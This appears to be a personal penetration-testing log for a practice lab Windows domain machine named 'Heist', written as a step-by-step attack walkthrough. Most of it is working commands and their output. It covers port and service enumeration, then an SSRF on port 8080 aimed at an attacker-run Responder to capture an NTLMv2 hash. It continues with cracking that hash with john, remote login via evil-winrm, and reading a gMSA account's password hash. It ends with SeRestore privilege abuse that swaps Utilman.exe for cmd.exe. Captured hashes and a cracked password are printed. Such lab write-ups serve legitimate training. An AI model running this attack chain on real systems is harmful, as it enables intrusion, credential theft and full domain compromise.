🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

• Machine Name: Heist
• IP Address: 192.168.123.165
• Operating System: Windows

ip=192.168.123.165

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 53

dig any heist.offsec @$ip

dig AXFR @$ip 

Port 135, 593

rpcclient -U '' -N $ip

Port 139, 445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 389, 636, 3268, 3269

ldapsearch -H ldap://$ip -x -s base namingcontexts

ldapsearch -H ldap://$ip -x -b"DC=hutch,DC=offsec" > ldap_dump.txt

Port 3389

Port 5985

Port 8080

sudo responder -I tun0

http://192.168.123.165:8080/?url=http://192.168.45.163/

found

[HTTP] NTLMv2 Hash     : enox::HEIST:45621c0c5aa61403:9E2BABDCEF69582700E0BA3B8088352F:0101000000000000610419405106DC011D512A43C4591A800000000002000800500059004D00510001001E00570049004E002D00580043004B00310036004E004B00470046004E00310004001400500059004D0051002E004C004F00430041004C0003003400570049004E002D00580043004B00310036004E004B00470046004E0031002E00500059004D0051002E004C004F00430041004C0005001400500059004D0051002E004C004F00430041004C00080030003000000000000000000000000030000041E54A0AB78366F411B62DAFC076B73CE5FE02BC070EE22A94BB1CD51FC705B10A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003100360033000000000000000000

use john to crack the hash

john enox.heist --wordlist='/home/kali/Documents/oscp/rockyou.txt'

enox:california

💣 Exploitation / Foothold

Tool / Script Used:

evil-winrm -i $ip -u enox -p california

🧬 Privilege Escalation

👤 Current Access

• User: enox
• Groups: N/A
• Shell Type: evil winrm

🔍 Enumeration

Bloodhound

./SharpHound.exe --collectionmethods All

download 20250805150930_BloodHound.zip .

found current user has ReadGMSAPassword privilege on svc_apache$

.\GMSAPasswordReader.exe --accountname svc_apache$

found svc_apache$ password hash

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : C17A10393707DA9B69D04CEDBF59A939
[*]       aes128_cts_hmac_sha1 : B85F5BB6CAD23A10C952A5B703099E58
[*]       aes256_cts_hmac_sha1 : 2F54D1F60F4E8C98E42E78E884B85F24219F3D1EA949244B338B21ABA77090D0
[*]       des_cbc_md5          : 2658F4C7490D8A7A

evil-winrm -i $ip -u svc_apache$ -H C17A10393707DA9B69D04CEDBF59A939

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Abusing Tokens
• Target Binary/Service: SeRestore
• Reference / Source: https://hacktricks.boitatech.com.br/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

🔧 Exploit Steps

• Smash to Administrator

.\EnableSeRestorePrivilege.ps1

mv C:\\Windows\\System32\\Utilman.exe C:\\Windows\\System32\\Utilman.old

mv cmd.exe Utilman.exe

rdesktop -0 192.168.123.165

press win+U